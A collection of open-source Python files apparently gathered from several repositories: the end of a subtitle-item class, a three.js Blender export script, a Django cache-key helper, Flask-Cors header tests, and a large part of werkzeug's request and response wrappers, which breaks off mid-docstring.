TIMESTAMP_SEPARATOR = '-->'
def __init__(self, index=0, start=None, end=None, text='', position=''):
try:
self.index = int(index)
except (TypeError, ValueError): # try to cast as int, but it's not mandatory
self.index = index
self.start = SubRipTime.coerce(start or 0)
self.end = SubRipTime.coerce(end or 0)
self.position = str(position)
self.text = str(text)
@property
def duration(self):
return self.end - self.start
@property
def text_without_tags(self):
RE_TAG = re.compile(r'<[^>]*?>')
return RE_TAG.sub('', self.text)
@property
def characters_per_second(self):
characters_count = len(self.text_without_tags.replace('\n', ''))
try:
return characters_count / (self.duration.ordinal / 1000.0)
except ZeroDivisionError:
return 0.0
def __str__(self):
position = ' %s' % self.position if self.position.strip() else ''
return self.ITEM_PATTERN % (self.index, self.start, self.end,
position, self.text)
if is_py2:
__unicode__ = __str__
def __str__(self):
raise NotImplementedError('Use unicode() instead!')
def _cmpkey(self):
return (self.start, self.end)
def shift(self, *args, **kwargs):
"""
shift(hours, minutes, seconds, milliseconds, ratio)
Add given values to start and end attributes.
All arguments are optional and have a default value of 0.
"""
self.start.shift(*args, **kwargs)
self.end.shift(*args, **kwargs)
@classmethod
def from_string(cls, source):
return cls.from_lines(source.splitlines(True))
@classmethod
def from_lines(cls, lines):
if len(lines) < 2:
raise InvalidItem()
lines = [l.rstrip() for l in lines]
index = None
if cls.TIMESTAMP_SEPARATOR not in lines[0]:
index = lines.pop(0)
start, end, position = cls.split_timestamps(lines[0])
body = '\n'.join(lines[1:])
return cls(index, start, end, body, position)
@classmethod
def split_timestamps(cls, line):
timestamps = line.split(cls.TIMESTAMP_SEPARATOR)
if len(timestamps) != 2:
raise InvalidItem()
start, end_and_position = timestamps
end_and_position = end_and_position.lstrip().split(' ', 1)
end = end_and_position[0]
position = end_and_position[1] if len(end_and_position) > 1 else ''
return (s.strip() for s in (start, end, position))
|
holmberd/three.js | refs/heads/master | utils/exporters/blender/tests/scripts/exporter.py | 295 | import os
import argparse
import sys
import io_three
from io_three.exporter import constants
try:
separator = sys.argv.index('--')
except IndexError:
print('ERROR: no parameters specified')
sys.exit(1)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('filepath')
for key, value in constants.EXPORT_OPTIONS.items():
if not isinstance(value, bool):
kwargs = {'type': type(value), 'default': value}
else:
kwargs = {'action':'store_true'}
parser.add_argument('--%s' % key, **kwargs)
return vars(parser.parse_args(sys.argv[separator+1:]))
def main():
args = parse_args()
args[constants.ENABLE_PRECISION] = True
args[constants.INDENT] = True
if args[constants.SCENE]:
io_three.exporter.export_scene(args['filepath'], args)
else:
io_three.exporter.export_geometry(args['filepath'], args)
if __name__ == '__main__':
main()
|
aleksandra-tarkowska/django | refs/heads/master | django/core/cache/utils.py | 121 | from __future__ import unicode_literals
import hashlib
from django.utils.encoding import force_bytes
from django.utils.http import urlquote
TEMPLATE_FRAGMENT_KEY_TEMPLATE = 'template.cache.%s.%s'
def make_template_fragment_key(fragment_name, vary_on=None):
if vary_on is None:
vary_on = ()
key = ':'.join(urlquote(var) for var in vary_on)
args = hashlib.md5(force_bytes(key))
return TEMPLATE_FRAGMENT_KEY_TEMPLATE % (fragment_name, args.hexdigest())
|
hoyjustin/ScopusAdapter | refs/heads/master | CorsTests/test_allow_headers.py | 1 | # -*- coding: utf-8 -*-
"""
test
~~~~
Flask-Cors tests module
"""
from tests.base_test import FlaskCorsTestCase, AppConfigTest
from flask import Flask
try:
# this is how you would normally import
from flask.ext.cors import *
except:
# support local usage without installed package
from flask_cors import *
class AllowHeadersTestCase(FlaskCorsTestCase):
def setUp(self):
self.app = Flask(__name__)
@self.app.route('/test_default')
@cross_origin()
def test_default():
return 'Welcome!'
@self.app.route('/test_override')
@cross_origin(allow_headers=['X-Example-Header-B', 'X-Example-Header-A'])
def test_override():
return 'Welcome!'
@self.app.route('/test_backwards_compatible')
@cross_origin(headers=['X-Example-Header-B', 'X-Example-Header-A'])
def test_list():
return 'Welcome!'
def test_default(self):
for resp in self.iter_responses('/test_default'):
self.assertTrue(resp.headers.get(ACL_ALLOW_HEADERS) is None,
"Default should have no allowed headers")
def test_override(self):
'''
If there is an Access-Control-Request-Method header in the request
and Access-Control-Request-Method is allowed for cross origin
requests and request method is OPTIONS,
the Access-Control-Allow-Headers header should be echoed back.
'''
resp = self.preflight('/test_override')
self.assertEqual(resp.headers.get(ACL_ALLOW_HEADERS), 'X-Example-Header-A, X-Example-Header-B')
def test_backwards_compatible(self):
'''
Version 1.10.2 changed the name of the parameter from 'headers'
to 'allow_headers'
'''
resp = self.preflight('/test_backwards_compatible')
self.assertEqual(resp.headers.get(ACL_ALLOW_HEADERS),
'X-Example-Header-A, X-Example-Header-B')
for resp in self.iter_responses('/test_backwards_compatible',
verbs=['HEAD', 'GET']):
self.assertTrue(resp.headers.get(ACL_ALLOW_HEADERS) is None)
class AppConfigAllowHeadersTestCase(AppConfigTest, AllowHeadersTestCase):
def __init__(self, *args, **kwargs):
super(AppConfigAllowHeadersTestCase, self).__init__(*args, **kwargs)
def test_default(self):
@self.app.route('/test_default')
@cross_origin()
def test_default():
return 'Welcome!'
super(AppConfigAllowHeadersTestCase, self).test_default()
def test_override(self):
self.app.config['CORS_ALLOW_HEADERS'] = ['X-Example-Header-B',
'X-Example-Header-A']
@self.app.route('/test_override')
@cross_origin()
def test_list():
return 'Welcome!'
super(AppConfigAllowHeadersTestCase, self).test_override()
def test_backwards_compatible(self):
'''
Version 1.10.2 changed the name of the parameter from 'headers'
to 'allow_headers'
'''
self.app.config['CORS_HEADERS'] = ['X-Example-Header-B',
'X-Example-Header-A']
@self.app.route('/test_backwards_compatible')
@cross_origin()
def test_list():
return 'Welcome!'
super(AppConfigAllowHeadersTestCase, self).test_backwards_compatible()
if __name__ == "__main__":
unittest.main() |
mboeru/maraschino | refs/heads/master | lib/werkzeug/wrappers.py | 85 | # -*- coding: utf-8 -*-
"""
werkzeug.wrappers
~~~~~~~~~~~~~~~~~
The wrappers are simple request and response objects which you can
subclass to do whatever you want them to do. The request object contains
the information transmitted by the client (webbrowser) and the response
object contains all the information sent back to the browser.
An important detail is that the request object is created with the WSGI
environ and will act as high-level proxy whereas the response object is an
actual WSGI application.
Like everything else in Werkzeug these objects will work correctly with
unicode data. Incoming form data parsed by the response object will be
decoded into an unicode object if possible and if it makes sense.
:copyright: (c) 2011 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import urlparse
from datetime import datetime, timedelta
from werkzeug.http import HTTP_STATUS_CODES, \
parse_accept_header, parse_cache_control_header, parse_etags, \
parse_date, generate_etag, is_resource_modified, unquote_etag, \
quote_etag, parse_set_header, parse_authorization_header, \
parse_www_authenticate_header, remove_entity_headers, \
parse_options_header, dump_options_header, http_date, \
parse_if_range_header, parse_cookie, dump_cookie, \
parse_range_header, parse_content_range_header, dump_header
from werkzeug.urls import url_decode, iri_to_uri
from werkzeug.formparser import FormDataParser, default_stream_factory
from werkzeug.utils import cached_property, environ_property, \
header_property, get_content_type
from werkzeug.wsgi import get_current_url, get_host, LimitedStream, \
ClosingIterator
from werkzeug.datastructures import MultiDict, CombinedMultiDict, Headers, \
EnvironHeaders, ImmutableMultiDict, ImmutableTypeConversionDict, \
ImmutableList, MIMEAccept, CharsetAccept, LanguageAccept, \
ResponseCacheControl, RequestCacheControl, CallbackDict, \
ContentRange
from werkzeug._internal import _empty_stream, _decode_unicode, \
_patch_wrapper, _get_environ
def _run_wsgi_app(*args):
"""This function replaces itself to ensure that the test module is not
imported unless required. DO NOT USE!
"""
global _run_wsgi_app
from werkzeug.test import run_wsgi_app as _run_wsgi_app
return _run_wsgi_app(*args)
def _warn_if_string(iterable):
"""Helper for the response objects to check if the iterable returned
to the WSGI server is not a string.
"""
if isinstance(iterable, basestring):
from warnings import warn
warn(Warning('response iterable was set to a string. This appears '
'to work but means that the server will send the '
'data to the client char, by char. This is almost '
'never intended behavior, use response.data to assign '
'strings to the response object.'), stacklevel=2)
class BaseRequest(object):
"""Very basic request object. This does not implement advanced stuff like
entity tag parsing or cache controls. The request object is created with
the WSGI environment as first argument and will add itself to the WSGI
environment as ``'werkzeug.request'`` unless it's created with
`populate_request` set to False.
There are a couple of mixins available that add additional functionality
to the request object, there is also a class called `Request` which
subclasses `BaseRequest` and all the important mixins.
It's a good idea to create a custom subclass of the :class:`BaseRequest`
and add missing functionality either via mixins or direct implementation.
Here an example for such subclasses::
from werkzeug.wrappers import BaseRequest, ETagRequestMixin
class Request(BaseRequest, ETagRequestMixin):
pass
Request objects are **read only**. As of 0.5 modifications are not
allowed in any place. Unlike the lower level parsing functions the
request object will use immutable objects everywhere possible.
Per default the request object will assume all the text data is `utf-8`
encoded. Please refer to `the unicode chapter <unicode.txt>`_ for more
details about customizing the behavior.
Per default the request object will be added to the WSGI
environment as `werkzeug.request` to support the debugging system.
If you don't want that, set `populate_request` to `False`.
If `shallow` is `True` the environment is initialized as shallow
object around the environ. Every operation that would modify the
environ in any way (such as consuming form data) raises an exception
unless the `shallow` attribute is explicitly set to `False`. This
is useful for middlewares where you don't want to consume the form
data by accident. A shallow request is not populated to the WSGI
environment.
.. versionchanged:: 0.5
read-only mode was enforced by using immutables classes for all
data.
"""
#: the charset for the request, defaults to utf-8
charset = 'utf-8'
#: the error handling procedure for errors, defaults to 'replace'
encoding_errors = 'replace'
#: the maximum content length. This is forwarded to the form data
#: parsing function (:func:`parse_form_data`). When set and the
#: :attr:`form` or :attr:`files` attribute is accessed and the
#: parsing fails because more than the specified value is transmitted
#: a :exc:`~werkzeug.exceptions.RequestEntityTooLarge` exception is raised.
#:
#: Have a look at :ref:`dealing-with-request-data` for more details.
#:
#: .. versionadded:: 0.5
max_content_length = None
#: the maximum form field size. This is forwarded to the form data
#: parsing function (:func:`parse_form_data`). When set and the
#: :attr:`form` or :attr:`files` attribute is accessed and the
#: data in memory for post data is longer than the specified value a
#: :exc:`~werkzeug.exceptions.RequestEntityTooLarge` exception is raised.
#:
#: Have a look at :ref:`dealing-with-request-data` for more details.
#:
#: .. versionadded:: 0.5
max_form_memory_size = None
#: the class to use for `args` and `form`. The default is an
#: :class:`~werkzeug.datastructures.ImmutableMultiDict` which supports
#: multiple values per key. alternatively it makes sense to use an
#: :class:`~werkzeug.datastructures.ImmutableOrderedMultiDict` which
#: preserves order or a :class:`~werkzeug.datastructures.ImmutableDict`
#: which is the fastest but only remembers the last key. It is also
#: possible to use mutable structures, but this is not recommended.
#:
#: .. versionadded:: 0.6
parameter_storage_class = ImmutableMultiDict
#: the type to be used for list values from the incoming WSGI environment.
#: By default an :class:`~werkzeug.datastructures.ImmutableList` is used
#: (for example for :attr:`access_list`).
#:
#: .. versionadded:: 0.6
list_storage_class = ImmutableList
#: the type to be used for dict values from the incoming WSGI environment.
#: By default an
#: :class:`~werkzeug.datastructures.ImmutableTypeConversionDict` is used
#: (for example for :attr:`cookies`).
#:
#: .. versionadded:: 0.6
dict_storage_class = ImmutableTypeConversionDict
#: The form data parser that shoud be used. Can be replaced to customize
#: the form date parsing.
form_data_parser_class = FormDataParser
def __init__(self, environ, populate_request=True, shallow=False):
self.environ = environ
if populate_request and not shallow:
self.environ['werkzeug.request'] = self
self.shallow = shallow
def __repr__(self):
# make sure the __repr__ even works if the request was created
# from an invalid WSGI environment. If we display the request
# in a debug session we don't want the repr to blow up.
args = []
try:
args.append("'%s'" % self.url)
args.append('[%s]' % self.method)
except Exception:
args.append('(invalid WSGI environ)')
return '<%s %s>' % (
self.__class__.__name__,
' '.join(args)
)
@property
def url_charset(self):
"""The charset that is assumed for URLs. Defaults to the value
of :attr:`charset`.
.. versionadded:: 0.6
"""
return self.charset
@classmethod
def from_values(cls, *args, **kwargs):
"""Create a new request object based on the values provided. If
environ is given missing values are filled from there. This method is
useful for small scripts when you need to simulate a request from an URL.
Do not use this method for unittesting, there is a full featured client
object (:class:`Client`) that allows to create multipart requests,
support for cookies etc.
This accepts the same options as the
:class:`~werkzeug.test.EnvironBuilder`.
.. versionchanged:: 0.5
This method now accepts the same arguments as
:class:`~werkzeug.test.EnvironBuilder`. Because of this the
`environ` parameter is now called `environ_overrides`.
:return: request object
"""
from werkzeug.test import EnvironBuilder
charset = kwargs.pop('charset', cls.charset)
builder = EnvironBuilder(*args, **kwargs)
try:
return builder.get_request(cls)
finally:
builder.close()
@classmethod
def application(cls, f):
"""Decorate a function as responder that accepts the request as first
argument. This works like the :func:`responder` decorator but the
function is passed the request object as first argument::
@Request.application
def my_wsgi_app(request):
return Response('Hello World!')
:param f: the WSGI callable to decorate
:return: a new WSGI callable
"""
#: return a callable that wraps the -2nd argument with the request
#: and calls the function with all the arguments up to that one and
#: the request. The return value is then called with the latest
#: two arguments. This makes it possible to use this decorator for
#: both methods and standalone WSGI functions.
return _patch_wrapper(f, lambda *a: f(*a[:-2]+(cls(a[-2]),))(*a[-2:]))
def _get_file_stream(self, total_content_length, content_type, filename=None,
content_length=None):
"""Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because webbrowsers do not provide
this value.
"""
return default_stream_factory(total_content_length, content_type,
filename, content_length)
@property
def want_form_data_parsed(self):
"""Returns True if the request method is ``POST``, ``PUT`` or
``PATCH``. Can be overriden to support other HTTP methods that
should carry form data.
.. versionadded:: 0.8
"""
return self.environ['REQUEST_METHOD'] in ('POST', 'PUT', 'PATCH')
def make_form_data_parser(self):
"""Creates the form data parser. Instanciates the
:attr:`form_data_parser_class` with some parameters.
.. versionadded:: 0.8
"""
return self.form_data_parser_class(self._get_file_stream,
self.charset,
self.encoding_errors,
self.max_form_memory_size,
self.max_content_length,
self.parameter_storage_class)
def _load_form_data(self):
"""Method used internally to retrieve submitted data. After calling
this sets `form` and `files` on the request object to multi dicts
filled with the incoming form data. As a matter of fact the input
stream will be empty afterwards.
.. versionadded:: 0.8
"""
# abort early if we have already consumed the stream
if 'stream' in self.__dict__:
return
if self.shallow:
raise RuntimeError('A shallow request tried to consume '
'form data. If you really want to do '
'that, set `shallow` to False.')
data = None
stream = _empty_stream
if self.want_form_data_parsed:
parser = self.make_form_data_parser()
data = parser.parse_from_environ(self.environ)
else:
# if we have a content length header we are able to properly
# guard the incoming stream, no matter what request method is
# used.
content_length = self.headers.get('content-length', type=int)
if content_length is not None:
stream = LimitedStream(self.environ['wsgi.input'],
content_length)
if data is None:
data = (stream, self.parameter_storage_class(),
self.parameter_storage_class())
# inject the values into the instance dict so that we bypass
# our cached_property non-data descriptor.
d = self.__dict__
d['stream'], d['form'], d['files'] = data
@cached_property
def stream(self):
"""The parsed stream if the submitted data was not multipart or
urlencoded form data. This stream is the stream left by the form data
parser module after parsing. This is *not* the WSGI input stream but
a wrapper around it that ensures the caller does not accidentally
read past `Content-Length`.
"""
self._load_form_data()
return self.stream
input_stream = environ_property('wsgi.input', 'The WSGI input stream.\n'
'In general it\'s a bad idea to use this one because you can easily '
'read past the boundary. Use the :attr:`stream` instead.')
@cached_property
def args(self):
"""The parsed URL parameters. By default an
:class:`~werkzeug.datastructures.ImmutableMultiDict`
is returned from this function. This can be changed by setting
:attr:`parameter_storage_class` to a different type. This might
be necessary if the order of the form data is important.
"""
return url_decode(self.environ.get('QUERY_STRING', ''),
self.url_charset, errors=self.encoding_errors,
cls=self.parameter_storage_class)
@cached_property
def data(self):
"""This reads the buffered incoming data from the client into the
string. Usually it's a bad idea to access :attr:`data` because a client
could send dozens of megabytes or more to cause memory problems on the
server.
To circumvent that make sure to check the content length first.
"""
return self.stream.read()
@cached_property
def form(self):
"""The form parameters. By default an
:class:`~werkzeug.datastructures.ImmutableMultiDict`
is returned from this function. This can be changed by setting
:attr:`parameter_storage_class` to a different type. This might
be necessary if the order of the form data is important.
"""
self._load_form_data()
return self.form
@cached_property
def values(self):
"""Combined multi dict for :attr:`args` and :attr:`form`."""
args = []
for d in self.args, self.form:
if not isinstance(d, MultiDict):
d = MultiDict(d)
args.append(d)
return CombinedMultiDict(args)
@cached_property
def files(self):
""":class:`~werkzeug.datastructures.MultiDict` object containing
all uploaded files. Each key in :attr:`files` is the name from the
``<input type="file" name="">``. Each value in :attr:`files` is a
Werkzeug :class:`~werkzeug.datastructures.FileStorage` object.
Note that :attr:`files` will only contain data if the request method was
POST, PUT or PATCH and the ``<form>`` that posted to the request had
``enctype="multipart/form-data"``. It will be empty otherwise.
See the :class:`~werkzeug.datastructures.MultiDict` /
:class:`~werkzeug.datastructures.FileStorage` documentation for
more details about the used data structure.
"""
self._load_form_data()
return self.files
@cached_property
def cookies(self):
"""Read only access to the retrieved cookie values as dictionary."""
return parse_cookie(self.environ, self.charset,
cls=self.dict_storage_class)
@cached_property
def headers(self):
"""The headers from the WSGI environ as immutable
:class:`~werkzeug.datastructures.EnvironHeaders`.
"""
return EnvironHeaders(self.environ)
@cached_property
def path(self):
"""Requested path as unicode. This works a bit like the regular path
info in the WSGI environment but will always include a leading slash,
even if the URL root is accessed.
"""
path = '/' + (self.environ.get('PATH_INFO') or '').lstrip('/')
return _decode_unicode(path, self.url_charset, self.encoding_errors)
@cached_property
def script_root(self):
"""The root path of the script without the trailing slash."""
path = (self.environ.get('SCRIPT_NAME') or '').rstrip('/')
return _decode_unicode(path, self.url_charset, self.encoding_errors)
@cached_property
def url(self):
"""The reconstructed current URL"""
return get_current_url(self.environ)
@cached_property
def base_url(self):
"""Like :attr:`url` but without the querystring"""
return get_current_url(self.environ, strip_querystring=True)
@cached_property
def url_root(self):
"""The full URL root (with hostname), this is the application root."""
return get_current_url(self.environ, True)
@cached_property
def host_url(self):
"""Just the host with scheme."""
return get_current_url(self.environ, host_only=True)
@cached_property
def host(self):
"""Just the host including the port if available."""
return get_host(self.environ)
query_string = environ_property('QUERY_STRING', '', read_only=True, doc=
'''The URL parameters as raw bytestring.''')
method = environ_property('REQUEST_METHOD', 'GET', read_only=True, doc=
'''The transmission method. (For example ``'GET'`` or ``'POST'``).''')
@cached_property
def access_route(self):
"""If a forwarded header exists this is a list of all ip addresses
from the client ip to the last proxy server.
"""
if 'HTTP_X_FORWARDED_FOR' in self.environ:
addr = self.environ['HTTP_X_FORWARDED_FOR'].split(',')
return self.list_storage_class([x.strip() for x in addr])
elif 'REMOTE_ADDR' in self.environ:
return self.list_storage_class([self.environ['REMOTE_ADDR']])
return self.list_storage_class()
@property
def remote_addr(self):
"""The remote address of the client."""
return self.environ.get('REMOTE_ADDR')
remote_user = environ_property('REMOTE_USER', doc='''
If the server supports user authentication, and the script is
protected, this attribute contains the username the user has
authenticated as.''')
scheme = environ_property('wsgi.url_scheme', doc='''
URL scheme (http or https).
.. versionadded:: 0.7''')
is_xhr = property(lambda x: x.environ.get('HTTP_X_REQUESTED_WITH', '')
.lower() == 'xmlhttprequest', doc='''
True if the request was triggered via a JavaScript XMLHttpRequest.
This only works with libraries that support the `X-Requested-With`
header and set it to "XMLHttpRequest". Libraries that do that are
prototype, jQuery and Mochikit and probably some more.''')
is_secure = property(lambda x: x.environ['wsgi.url_scheme'] == 'https',
doc='`True` if the request is secure.')
is_multithread = environ_property('wsgi.multithread', doc='''
boolean that is `True` if the application is served by
a multithreaded WSGI server.''')
is_multiprocess = environ_property('wsgi.multiprocess', doc='''
boolean that is `True` if the application is served by
a WSGI server that spawns multiple processes.''')
is_run_once = environ_property('wsgi.run_once', doc='''
boolean that is `True` if the application will be executed only
once in a process lifetime. This is the case for CGI for example,
but it's not guaranteed that the exeuction only happens one time.''')
class BaseResponse(object):
"""Base response class. The most important fact about a response object
is that it's a regular WSGI application. It's initialized with a couple
of response parameters (headers, body, status code etc.) and will start a
valid WSGI response when called with the environ and start response
callable.
Because it's a WSGI application itself processing usually ends before the
actual response is sent to the server. This helps debugging systems
because they can catch all the exceptions before responses are started.
Here a small example WSGI application that takes advantage of the
response objects::
from werkzeug.wrappers import BaseResponse as Response
def index():
return Response('Index page')
def application(environ, start_response):
path = environ.get('PATH_INFO') or '/'
if path == '/':
response = index()
else:
response = Response('Not Found', status=404)
return response(environ, start_response)
Like :class:`BaseRequest` which object is lacking a lot of functionality
implemented in mixins. This gives you a better control about the actual
API of your response objects, so you can create subclasses and add custom
functionality. A full featured response object is available as
:class:`Response` which implements a couple of useful mixins.
To enforce a new type of already existing responses you can use the
:meth:`force_type` method. This is useful if you're working with different
subclasses of response objects and you want to post process them with a
know interface.
Per default the request object will assume all the text data is `utf-8`
encoded. Please refer to `the unicode chapter <unicode.txt>`_ for more
details about customizing the behavior.
Response can be any kind of iterable or string. If it's a string it's
considered being an iterable with one item which is the string passed.
Headers can be a list of tuples or a
:class:`~werkzeug.datastructures.Headers` object.
Special note for `mimetype` and `content_type`: For most mime types
`mimetype` and `content_type` work the same, the difference affects
only 'text' mimetypes. If the mimetype passed with `mimetype` is a
mimetype starting with `text/` it becomes a charset parameter defined
with the charset of the response object. In contrast the
`content_type` parameter is always added as header unmodified.
.. versionchanged:: 0.5
the `direct_passthrough` parameter was added.
:param response: a string or response iterable.
:param status: a string with a status or an integer with the status code.
:param headers: a list of headers or a
:class:`~werkzeug.datastructures.Headers` object.
:param mimetype: the mimetype for the request. See notice above.
:param content_type: the content type for the request. See notice above.
:param direct_passthrough: if set to `True` :meth:`iter_encoded` is not
called before iteration which makes it
possible to pass special iterators though
unchanged (see :func:`wrap_file` for more
details.)
"""
#: the charset of the response.
charset = 'utf-8'
#: the default status if none is provided.
default_status = 200
#: the default mimetype if none is provided.
default_mimetype = 'text/plain'
#: if set to `False` accessing properties on the response object will
#: not try to consume the response iterator and convert it into a list.
#:
#: .. versionadded:: 0.6.2
#:
#: That attribute was previously called `implicit_seqence_conversion`.
#: (Notice the typo). If you did use this feature, you have to adapt
#: your code to the name change.
implicit_sequence_conversion = True
#: Should this response object correct the location header to be RFC
#: conformant? This is true by default.
#:
#: .. versionadded:: 0.8
autocorrect_location_header = True
#: Should this response object automatically set the content-length
#: header if possible? This is true by default.
#:
#: .. versionadded:: 0.8
automatically_set_content_length = True
def __init__(self, response=None, status=None, headers=None,
mimetype=None, content_type=None, direct_passthrough=False):
if isinstance(headers, Headers):
self.headers = headers
elif not headers:
self.headers = Headers()
else:
self.headers = Headers(headers)
if content_type is None:
if mimetype is None and 'content-type' not in self.headers:
mimetype = self.default_mimetype
if mimetype is not None:
mimetype = get_content_type(mimetype, self.charset)
content_type = mimetype
if content_type is not None:
self.headers['Content-Type'] = content_type
if status is None:
status = self.default_status
if isinstance(status, (int, long)):
self.status_code = status
else:
self.status = status
self.direct_passthrough = direct_passthrough
self._on_close = []
# we set the response after the headers so that if a class changes
# the charset attribute, the data is set in the correct charset.
if response is None:
self.response = []
elif isinstance(response, basestring):
self.data = response
else:
self.response = response
def call_on_close(self, func):
"""Adds a function to the internal list of functions that should
be called as part of closing down the response. Since 0.7 this
function also returns the function that was passed so that this
can be used as a decorator.
.. versionadded:: 0.6
"""
self._on_close.append(func)
return func
def __repr__(self):
if self.is_sequence:
body_info = '%d bytes' % sum(map(len, self.iter_encoded()))
else:
body_info = self.is_streamed and 'streamed' or 'likely-streamed'
return '<%s %s [%s]>' % (
self.__class__.__name__,
body_info,
self.status
)
@classmethod
def force_type(cls, response, environ=None):
"""Enforce that the WSGI response is a response object of the current
type. Werkzeug will use the :class:`BaseResponse` internally in many
situations like the exceptions. If you call :meth:`get_response` on an
exception you will get back a regular :class:`BaseResponse` object, even
if you are using a custom subclass.
This method can enforce a given response type, and it will also
convert arbitrary WSGI callables into response objects if an environ
is provided::
# convert a Werkzeug response object into an instance of the
# MyResponseClass subclass.
response = MyResponseClass.force_type(response)
# convert any WSGI application into a response object
response = MyResponseClass.force_type(response, environ)
This is especially useful if you want to post-process responses in
the main dispatcher and use functionality provided by your subclass.
Keep in mind that this will modify response objects in place if
possible!
:param response: a response object or wsgi application.
:param environ: a WSGI environment object.
:return: a response object.
"""
if not isinstance(response, BaseResponse):
if environ is None:
raise TypeError('cannot convert WSGI application into '
'response objects without an environ')
response = BaseResponse(*_run_wsgi_app(response, environ))
response.__class__ = cls
return response
@classmethod
def from_app(cls, app, environ, buffered=False):
"""Create a new response object from an application output. This
works best if you pass it an application that returns a generator all
the time. Sometimes applications may use the `write()` callable
returned by the `start_response` function. This tries to resolve such
edge cases automatically. But if you don't get the expected output
you should set `buffered` to `True` which enforces buffering.
:param app: the WSGI application to execute.
:param environ: the WSGI environment to execute against.
:param buffered: set to `True` to enforce buffering.
:return: a response object.
"""
return cls(*_run_wsgi_app(app, environ, buffered))
def _get_status_code(self):
return self._status_code
def _set_status_code(self, code):
self._status_code = code
try:
self._status = '%d %s' % (code, HTTP_STATUS_CODES[code].upper())
except KeyError:
self._status = '%d UNKNOWN' % code
status_code = property(_get_status_code, _set_status_code,
doc='The HTTP Status code as number')
del _get_status_code, _set_status_code
def _get_status(self):
return self._status
def _set_status(self, value):
self._status = value
try:
self._status_code = int(self._status.split(None, 1)[0])
except ValueError:
self._status_code = 0
status = property(_get_status, _set_status, doc='The HTTP Status code')
del _get_status, _set_status
def _get_data(self):
"""The string representation of the request body. Whenever you access
this property the request iterable is encoded and flattened. This
can lead to unwanted behavior if you stream big data.
This behavior can be disabled by setting
:attr:`implicit_sequence_conversion` to `False`.
"""
self._ensure_sequence()
return ''.join(self.iter_encoded())
def _set_data(self, value):
# if an unicode string is set, it's encoded directly so that we
# can set the content length
if isinstance(value, unicode):
value = value.encode(self.charset)
self.response = [value]
if self.automatically_set_content_length:
self.headers['Content-Length'] = str(len(value))
data = property(_get_data, _set_data, doc=_get_data.__doc__)
del _get_data, _set_data
def _ensure_sequence(self, mutable=False):
"""This method can be called by methods that need a sequence. If
`mutable` is true, it will also ensure that the response sequence
is a standard Python list.
.. versionadded:: 0.6
"""
if self.is_sequence:
# if we need a mutable object, we ensure it's a list.
if mutable and not isinstance(self.response, list):
self.response = list(self.response)
return
if not self.implicit_sequence_conversion:
raise RuntimeError('The response object required the iterable '
'to be a sequence, but the implicit '
'conversion was disabled. Call '
'make_sequence() yourself.')
self.make_sequence()
def make_sequence(self):
"""Converts the response iterator in a list. By default this happens
automatically if required. If `implicit_sequence_conversion` is
disabled, this method is not automatically called and some properties
might raise exceptions. This also encodes all the items.
.. versionadded:: 0.6
"""
if not self.is_sequence:
# if we consume an iterable we have to ensure that the close
# method of the iterable is called if available when we tear
# down the response
close = getattr(self.response, 'close', None)
self.response = list(self.iter_encoded())
if close is not None:
self.call_on_close(close)
def iter_encoded(self, charset=None):
"""Iter the response encoded with the encoding of the response.
If the response object is invoked as WSGI application the return
value of this method is used as application iterator unless
:attr:`direct_passthrough` was activated.
.. versionchanged:: 0.6
The `charset` parameter was deprecated and became a no-op.
"""
# XXX: deprecated
if __debug__ and charset is not None: # pragma: no cover
from warnings import warn
warn(DeprecationWarning('charset was deprecated and is ignored.'),
stacklevel=2)
charset = self.charset
if __debug__:
_warn_if_string(self.response)
for item in self.response:
if isinstance(item, unicode):
yield item.encode(charset)
else:
yield str(item)
def set_cookie(self, key, value='', max_age=None, expires=None,
path='/', domain=None, secure=None, httponly=False):
"""Sets a cookie. The parameters are the same as in the cookie `Morsel`
object in the Python standard library but it accepts unicode data, too.
:param key: the key (name) of the cookie to be set.
:param value: the value of the cookie.
:param max_age: should be a number of seconds, or `None` (default) if
the cookie should last only as long as the client's
browser session.
:param expires: should be a `datetime` object or UNIX timestamp.
:param domain: if you want to set a cross-domain cookie. For example,
``domain=".example.com"`` will set a cookie that is
readable by the domain ``www.example.com``,
``foo.example.com`` etc. Otherwise, a cookie will only
be readable by the domain that set it.
:param path: limits the cookie to a given path, per default it will
span the whole domain.
"""
self.headers.add('Set-Cookie', dump_cookie(key, value, max_age,
expires, path, domain, secure, httponly,
self.charset))
def delete_cookie(self, key, path='/', domain=None):
"""Delete a cookie. Fails silently if key doesn't exist.
:param key: the key (name) of the cookie to be deleted.
:param path: if the cookie that should be deleted was limited to a
path, the path has to be defined here.
:param domain: if the cookie that should be deleted was limited to a
domain, that domain has to be defined here.
"""
self.set_cookie(key, expires=0, max_age=0, path=path, domain=domain)
@property
def header_list(self): # pragma: no cover
# XXX: deprecated
if __debug__:
from warnings import warn
warn(DeprecationWarning('header_list is deprecated'),
stacklevel=2)
return self.headers.to_list(self.charset)
@property
def is_streamed(self):
"""If the response is streamed (the response is not an iterable with
a length information) this property is `True`. In this case streamed
means that there is no information about the number of iterations.
This is usually `True` if a generator is passed to the response object.
This is useful for checking before applying some sort of post
filtering that should not take place for streamed responses.
"""
try:
len(self.response)
except TypeError:
return True
return False
@property
def is_sequence(self):
"""If the iterator is buffered, this property will be `True`. A
response object will consider an iterator to be buffered if the
response attribute is a list or tuple.
.. versionadded:: 0.6
"""
return isinstance(self.response, (tuple, list))
def close(self):
"""Close the wrapped response if possible."""
if hasattr(self.response, 'close'):
self.response.close()
for func in self._on_close:
func()
def freeze(self):
"""Call this method if you want to make your response object ready for
being pickled. This buffers the generator if there is one. It will
also set the `Content-Length` header to the length of the body.
.. versionchanged:: 0.6
The `Content-Length` header is now set.
"""
# we explicitly set the length to a list of the *encoded* response
# iterator. Even if the implicit sequence conversion is disabled.
self.response = list(self.iter_encoded())
self.headers['Content-Length'] = str(sum(map(len, self.response)))
def fix_headers(self, environ):
# XXX: deprecated
if __debug__:
from warnings import warn
warn(DeprecationWarning('called into deprecated fix_headers baseclass '
'method. Use get_wsgi_headers instead.'),
stacklevel=2)
self.headers[:] = self.get_wsgi_headers(environ)
def get_wsgi_headers(self, environ):
"""This is automatically called right before the response is started
